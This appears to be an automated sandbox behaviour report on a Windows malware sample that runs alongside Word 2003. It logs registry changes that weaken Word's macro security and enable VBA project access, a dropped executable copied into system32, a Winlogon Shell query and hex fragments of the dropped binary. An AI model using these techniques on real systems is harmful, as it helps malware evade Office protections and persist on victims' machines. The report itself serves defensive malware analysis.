HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Level dword 1 4 success or wait 1 10003DA8 RegSetValueExA
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security AccessVBOM dword 1 0 success or wait 1 10003E06 RegSetValueExA
Key Value Queried
Key Path Name Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Level object name not found 1 10003D03 RegQueryValueExA
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security AccessVBOM object name not found 1 10003D64 RegQueryValueExA
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Level success or wait 1 10003D03 RegQueryValueExA
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security AccessVBOM success or wait 1 10003D64 RegQueryValueExA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell success or wait 1 1000290D RegQueryValueExA

Mutex Activites
Name Completion Count Source Address Symbol

Process Activites
PID Process info class Completion Count Source Address Symbol
Process Terminated
PID Filepath Completion Count Source Address Symbol
1764 C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe success or wait 1 401A10 ExitProcess

Thread Activites
Thread Created
TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
712 1764 7C8106F9 40145C C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe success or wait 1 401378 CreateThread
TID PID Path Completion Count Source Address Symbol
Thread Delayed
TID Delay Completion Count Source Address Symbol
712 -5s success or wait 1 1000401B Sleep

Memory Activites
Memory Allocated
PID Filepath Base Length Protection Completion Count Source Address Symbol
1764 C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe 340000 12FEF0 page read and write success or wait 1 4018D0 VirtualAlloc
1764 C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe 350000 12FED0 page execute and read and write success or wait 1 401928 VirtualAlloc
1764 C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe 370000 12FE04 page execute and read and write success or wait 1 3512FB VirtualAlloc
1764 C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe 400000 12FE04 page execute and read and write success or wait 1 351796 VirtualAlloc
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:39:48 0 1 0
09:39:50 0 1 0
09:39:52 0 1 0
09:39:54 0 2 0
09:39:56 0 2 0
09:39:59 0 2 0
09:40:01 0 2 0
09:40:46 0 2 0
09:40:50 0 3 0
09:40:53 0 3 0
09:41:41 0 3 0
09:41:48 0 3 0
09:41:59 0 3 0
09:42:03 0 3 0

System Activites
System info class Completion Count Source Address Symbol

Timing Activites
Time Completion Count Source Address Symbol

Windows UI Activites
Window name Class name HWND Completion Count Source Address Symbol
HWND Completion Count Source Address Symbol
Window UIs Enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address Symbol
0 0 false 2C8 1, 57005C, 4E0049, 4F0044, 530057, 73005C, 730079, 650074, 33006D, 5C0032, 700078, 700073, 720032, 730065, 64002E success or wait 2 10003F5B CoUninitialize
HWND Message LParam WParam Completion Count Source Address Symbol
TID Message LParam WParam Completion Count Source Address Symbol
Module Thread id Hook code Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 2C8 HWNDs: 1, 57005C, 4E0049, 4F0044, 530057, 73005C, 730079, 650074, 33006D, 5C0032, 700078, 700073, 720032, 730065, 64002E success or wait 1022159870
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 2C8 HWNDs: 1, 57005C, 4E0049, 4F0044, 530057, 73005C, 730079, 650074, 33006D, 5C0032, 700078, 700073, 720032, 730065, 64002E success or wait 1022271449
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: read attributes and synchronize and generic read Options: sequential only and synchronous io non alert and non directory file and open reparse point Attributes: none Content Overwritten: true success or wait 1023726630
File opened Path: C:\WINDOWS\system32\hyli.igo Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true success or wait 1023727864
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Name: Shell success or wait 1024171676
Process terminated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe success or wait 1024305403
Section loaded Path: \KnownDlls\advapi32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 530438197
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 530442130
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 530447041
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 340000 Length: 12FEF0 Allocation Type: unknown Protection: page read and write success or wait 530456920
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 350000 Length: 12FED0 Allocation Type: unknown Protection: page execute and read and write success or wait 530459416
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 370000 Length: 12FE04 Allocation Type: unknown Protection: page execute and read and write success or wait 530464890
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 400000 Size: 0 Protection: execute and read and write Mapped to pid: own pid access denied 530466583
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 530467125
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 390000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 530474103
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 400000 Length: 12FE04 Allocation Type: unknown Protection: page execute and read and write success or wait 530478861
Thread created PID: 1764 TID: 712 EIP: 7C8106F9 EAX: 40145C Imagepath: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe success or wait 530486659
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: null success or wait 531483016
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: true success or wait 531939927
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 532174228
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 55 89 E5 53 83 EC 44 C6 45 F5 25 C6 45 F6 78 C6 45 F3 25 C6 45 F4 75 C6 45 F7 00 C7 44 24 0C F4 92 2B CB C7 44 24 08 F4 92 2B CB 8D 45 F3 89 44 24 04 8D 5D D3 89 1C 24 FF 15 8C 82 00 10 89 5C 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 FF 15 2C 82 00 10 83 EC 0C 89 C3 FF 15 7C 82 00 10 3D B7 success or wait 532269878
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: C7 04 24 0E 00 00 00 E8 50 21 00 00 84 C0 75 08 8D 65 F4 5B 5E 5F C9 C3 8B 1D EC 82 00 10 09 F3 8D BD A0 FD FF FF 89 7C 24 04 C7 04 24 0C 00 00 00 E8 4A 35 00 00 8B 15 8C 82 00 10 89 95 90 FD FF FF A1 EC 82 00 10 B1 64 D3 F8 89 FA 29 C2 89 D0 83 C0 64 89 44 24 04 C7 04 24 0B 00 00 00 E8 1C 35 00 00 success or wait 532280577
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: E4 00 00 00 80 BD 87 EB FF FF 00 0F 84 C3 00 00 00 85 C0 7E 42 31 F6 EB 28 8D 76 00 A1 EC 82 00 10 B1 E8 D3 F8 89 DA 29 C2 01 D6 C7 04 24 E8 03 00 00 FF 15 80 82 00 10 51 39 B5 B4 EB FF FF 7E 16 E8 EE 17 00 00 83 F8 02 75 D1 A1 EC 82 00 10 8D 3C 85 02 00 00 00 83 FF 02 0F 84 AA 00 00 00 C7 04 24 01 success or wait 532290026
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: B5 F0 FC FF FF B1 96 F3 A5 89 04 24 FF 15 6C 82 00 10 50 8D 85 48 FF FF FF 89 44 24 04 C7 04 24 00 00 00 00 E8 57 2D 00 00 8D 55 C8 89 54 24 08 C7 44 24 04 04 00 00 00 89 04 24 E8 BC FD FF FF C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 45 D8 00 00 00 00 C7 45 DC 00 00 00 00 8B 85 E0 FC FF FF 89 44 success or wait 532375958
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 74 3A 39 F2 77 22 8D 41 04 8D 76 00 39 C2 76 0E 89 C1 80 39 3A 74 D1 8D 41 01 39 C2 77 F2 31 C0 5B 5E 5F C9 C3 8D 76 00 89 F0 66 90 40 80 38 2F 74 0C 39 C2 77 F6 8D 46 01 EB D1 90 89 F0 39 C2 76 F4 C6 00 00 8D 78 01 8A 40 01 3C 0D 74 21 3C 0A 74 1D 39 FA 76 DF 89 F9 8D 76 00 41 8A 01 3C 0D 74 0F 3C success or wait 532385124
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 89 04 24 FF 15 A8 82 00 10 83 EC 10 85 C0 74 66 01 C3 85 DB 7F 9A EB C9 84 C9 74 AD 89 F2 84 D2 75 07 BE 01 00 00 00 EB A0 47 74 B0 8D 45 E4 89 44 24 08 89 7C 24 04 8D 95 E0 F7 FF FF 89 14 24 E8 8B FB FF FF 85 C0 0F 85 3B 01 00 00 80 3F 3C 74 24 8B 55 14 C6 02 00 8D 85 E0 F7 FF FF 89 44 24 04 C7 04 success or wait 532392018
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 5C 24 04 89 04 24 FF 15 C0 82 00 10 83 EC 24 8B 45 F4 8B 5D FC C9 C3 90 55 89 E5 57 56 53 81 EC AC 00 00 00 8B 75 0C 8B 7D 10 8B 45 08 89 04 24 E8 5B FF FF FF 89 C3 85 C0 74 61 85 FF 74 14 8D 85 68 FF FF FF 89 44 24 04 89 3C 24 E8 8B 1F 00 00 89 C6 8B 45 1C 89 44 24 14 8B 45 18 89 44 24 10 8B 45 14 success or wait 532488639
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 24 FF 15 A8 82 00 10 83 EC 10 89 85 E4 F7 FF FF C6 84 05 E8 F7 FF FF 00 85 C0 7E 36 89 C2 4A 31 FF 31 F6 8D 85 E8 F7 FF FF 89 D9 89 F3 89 CE EB 12 8D 76 00 80 F9 0A 74 43 31 FF 31 DB 85 D2 74 0F 40 4A 8A 08 80 F9 0D 75 EA B3 01 85 D2 75 F1 89 F3 8B 55 08 C7 82 4C 09 00 00 00 00 00 00 89 1C 24 FF 15 success or wait 532495722
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 C7 44 24 14 04 00 00 00 8D 55 08 89 54 24 10 C7 44 24 0C 04 00 00 00 89 5C 24 08 C7 44 24 04 00 00 00 00 89 04 24 E8 EC F7 FF FF 83 C4 24 5B C9 C3 66 90 55 89 E5 53 83 EC 34 C7 45 F4 00 00 00 00 C7 04 24 14 00 00 00 E8 66 17 00 00 89 C3 C7 04 24 12 00 00 00 E8 58 17 00 00 C7 44 24 14 04 00 00 00 success or wait 532504187
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 10 75 E6 8B 45 08 C7 80 24 08 00 00 01 00 00 00 C7 80 48 08 00 00 00 00 00 00 C7 44 24 04 10 50 00 10 83 C0 14 89 04 24 FF 15 EC 81 00 10 83 EC 08 8B 55 08 80 7A 05 00 75 48 8B 82 24 08 00 00 EB 20 66 90 8B 5D 08 8B 83 24 08 00 00 89 C2 C1 E2 07 01 C2 80 7C 13 14 00 74 27 40 89 83 24 08 00 00 89 44 success or wait 532603291
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 8B 55 0C 89 54 24 04 89 04 24 FF 15 FC 81 00 10 83 EC 08 85 C0 0F 94 C0 8D 65 F8 5E 5F C9 C3 90 55 89 E5 57 56 53 83 EC 6C 8B 55 0C 80 3A 3A 74 1F 3B 55 10 73 10 89 D6 8B 45 10 90 46 80 3E 3A 74 10 39 F0 77 F6 83 C4 6C 5B 5E 5F C9 C3 66 90 89 D6 39 75 10 76 EF A1 20 80 00 10 85 C0 74 E6 89 F7 29 D7 success or wait 532612561
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: E8 7B 0D 00 00 89 44 24 04 89 34 24 FF 95 64 FE FF FF 83 EC 08 8A 03 84 C0 0F 84 91 00 00 00 31 C9 8D 76 00 8D 50 D0 80 FA 09 77 0A 8D 14 89 0F BE C0 8D 4C 50 D0 43 8A 03 84 C0 75 E7 83 F9 77 7E 6E 8D 5D B0 89 5C 24 04 C7 04 24 1A 00 00 00 E8 2B 0D 00 00 8D 45 E0 89 44 24 20 8D 45 E4 89 44 24 1C C7 success or wait 532620465
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 51 04 00 00 A1 E0 81 00 10 E8 7A FA FF FF C7 04 24 88 13 00 00 FF 15 80 82 00 10 51 8D 4D E0 8D 55 E4 89 F8 E8 47 FB FF FF E9 19 FF FF FF 66 90 8D 45 A0 89 44 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 B9 01 00 00 00 BA 0E 00 00 00 8B 45 A8 E8 30 FA FF FF 85 C0 0F 85 6B FF FF FF 8B 45 A8 85 success or wait 532712117
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 89 7C 24 0C C7 44 24 08 00 00 00 00 8B 85 64 FF FF FF 89 44 24 04 8B 02 89 04 24 89 95 5C FF FF FF E8 96 00 00 00 89 03 89 7C 24 04 8B 85 64 FF FF FF 89 04 24 E8 8A 05 00 00 83 EC 08 89 03 83 C3 04 8B 95 5C FF FF FF 83 C2 04 46 8B 85 60 FF FF FF 39 34 C5 20 52 00 10 7F A5 89 D6 FF 85 60 FF FF FF 83 success or wait 532723028
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 84 C0 0F 84 70 01 00 00 8B 7D 0C C7 45 E8 00 00 00 00 66 90 FF 45 08 85 DB 0F 84 45 01 00 00 B8 61 00 00 00 31 D2 F7 75 EC 38 45 F3 0F 8D B6 00 00 00 66 90 B8 41 00 00 00 88 D9 D3 E8 38 45 F3 0F 8C CA 00 00 00 80 7D F3 5A 0F 8F C0 00 00 00 89 D8 B1 5A D3 E0 8D 48 5A 88 4D E7 BA 41 00 00 00 BE 41 00 success or wait 532729319
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: AA BF 5B 1E C6 BA A6 BF 45 90 AB B0 F8 B4 B8 C4 C2 CB 2F 6E FC 95 89 D2 2A FE CE C9 95 D5 DC A1 D8 91 29 6B E9 DD D4 D0 30 E0 84 DD 91 CC DD B6 85 DD 39 30 B6 D2 D6 BF 88 6E ED F7 AB 5D 1B F2 9B 89 28 7B A8 CE C7 DD 45 FE 3D DC 82 83 D6 C4 00 90 40 00 00 00 00 00 00 00 00 00 00 00 00 00 04 70 00 10 success or wait 532825201
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 532947139
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 4F 68 7A 67 6E 00 59 45 45 59 63 75 6E 6F 71 6A 77 00 44 66 67 67 75 76 56 48 52 50 00 74 79 6F 71 75 62 00 47 68 67 6E 63 75 65 20 4C 78 71 67 76 6B 72 6E 20 77 79 6E 73 75 61 00 25 76 20 4F 6D 64 20 22 25 75 22 28 45 79 42 64 6F 20 77 20 43 55 20 56 74 78 6C 71 6B 29 20 43 75 20 4F 6F 74 6A 0D success or wait 533048521
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 00 00 00 36 3F 91 4C 00 00 00 00 6E 90 00 00 01 00 00 00 07 00 00 00 07 00 00 00 28 90 00 00 44 90 00 00 60 90 00 00 9C 10 00 00 E0 10 00 00 E8 10 00 00 F4 15 00 00 0C 16 00 00 D8 16 00 00 70 15 00 00 78 90 00 00 80 90 00 00 8A 90 00 00 95 90 00 00 9C 90 00 00 A3 90 00 00 AA 90 00 00 00 00 01 00 success or wait 533053349
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 10 00 00 A8 00 00 00 3A 30 53 30 5E 30 75 30 92 30 A9 30 BF 30 FA 30 16 31 40 31 46 31 75 31 87 31 93 31 99 31 C3 31 D0 31 DE 31 E4 31 08 32 0E 32 2F 32 51 32 69 32 72 32 BB 32 E3 32 37 33 5C 33 78 33 8A 33 E4 33 1A 34 38 34 43 34 98 34 AD 34 D7 34 EC 34 F8 34 06 35 93 35 AA 35 B1 35 C0 35 C6 35 success or wait 533062648
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 0 Value: unknown success or wait 533164320
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: write and read and execute Type: commit Baseaddress: 3A0000 Size: 24576 Protection: execute Mapped to pid: own pid success or wait 533496748
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 533614528
Section loaded Path: \KnownDlls\user32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 536593642
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 536681058
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3A0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 537361369
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3A0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 537576503
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 537688339
Section loaded Path: \KnownDlls\ws2_32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 538506166
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 538585998
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 539033665
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 539144363
Section loaded Path: \KnownDlls\iphlpapi.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 539872039
Section loaded Path: C:\WINDOWS\system32\iphlpapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid success or wait 539983603
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 543957631
Section loaded Path: \KnownDlls\oleaut32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 545416677
Key created Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security success or wait 742506083
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level object name not found 742506639
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM object name not found 742506843
Key value set Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level Type: dword Data: 1 Old data: success or wait 742507069
Key value set Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM Type: dword Data: 1 Old data: success or wait 742617277
Thread delayed Time: -5 TID: 712 success or wait 980996250
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level success or wait 999402974
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM success or wait 999619868
Key value replaced with new Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level Type: dword Data: 4 Old data: 1 success or wait 999841230
Key value replaced with new Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM Type: dword Data: 0 Old data: 1 success or wait 999843986

Analysis File: WINWORD.EXE PID: 1680 Parent PID: 836

General
Start time: 09:39:59
Start date: 24/01/2012
Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x30000000
File size: 12061896 bytes
MD5 hash: 7A0FA3A0282B4630F3768A74441D4BAE

File Activites
File Opened
File Path Access Options Content overwritten Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp read attributes and synchronize and generic read sequential only and synchronous io non alert and non directory file and open reparse point true success or wait 1 266116C CopyFileA
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\WINDOWS\system32\hyli.igo read attributes and delete and synchronize and generic write archive sequential only and synchronous io non alert and non directory file success or wait 1 266116C CopyFileA
File Path Completion Count Source Address Symbol
File Copied
Old File Path New File Path Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp C:\WINDOWS\system32\hyli.igo success or wait 1 266116C CopyFileA
File Path Offset Length Value Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition File Mask Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL write and read and execute commit 860000 12242944 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and write and read and execute image 30C90000 12288000 own pid read write success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown 870000 57344 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL write and read and execute commit 8C0000 774144 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL query and read commit 8C0000 774144 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19211106568_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19211106568_S-1-5-21-507921405-1960408961-839522115-500 query and write and read reserve A10000 126976 own pid read write success or wait 1
\KnownDlls\uxtheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit A30000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit A30000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit A30000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit A30000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit A50000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown A50000 262144 own pid read write success or wait 1
\KnownDlls\version.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit A90000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit A90000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
\BaseNamedObjects\PrimaryWord11SharedMemoryArea read unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\PrimaryWord11SharedMemoryArea query and write and read commit 10F0000 4096 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL write and read and execute commit AA0000 1753088 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL query and read commit AA0000 1753088 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg20321106568_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
